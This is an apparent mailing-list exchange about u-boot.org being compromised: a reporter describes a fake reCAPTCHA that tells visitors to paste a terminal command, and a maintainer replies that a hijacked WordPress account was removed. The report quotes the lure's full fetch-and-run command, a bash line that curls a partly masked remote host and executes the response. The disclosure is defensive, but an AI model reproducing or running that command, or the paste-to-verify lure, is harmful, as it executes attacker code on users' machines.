Hi Mate, On Mon, 23 Feb 2026 at 03:02, Mate Kukri <[email protected]> wrote: > > Dear Maintainers, > > U-Boot.org <http://u-boot.org/> seems to be trying to social engineer > visitors into executing potentially malicious code. > > The website presents a seemingly fake re-Captcha upon visiting, which after > ticking the box instructs the user to open their terminal and paste and > execute a command from the clipboard for “verification". > > Said command curl-s some text from a network server and runs it as a bash > command. > > I have not done much analysis on the exact behaviour of the payload, but > social engineering users into executing arbitrary local payload is not an > acceptable way of doing web visitor verification. > > An example of the clipboard payload I am told to execute (but did not) is > (sub XXXXXXXX with microzen) > /bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL > 'tl5mltkq.XXXXXXXX.digital/?=check&&actmn=gTGzPBzHSGwagnVq')"; echo > ""BotGuard: Answer the protector challenge. Ref: 15978
Thanks for the report. An old wordpress account was compromised. It has been deleted and various measures have been put in place to ensure there is no repeat. We can share more detail privately to those interested. Regards, SImon
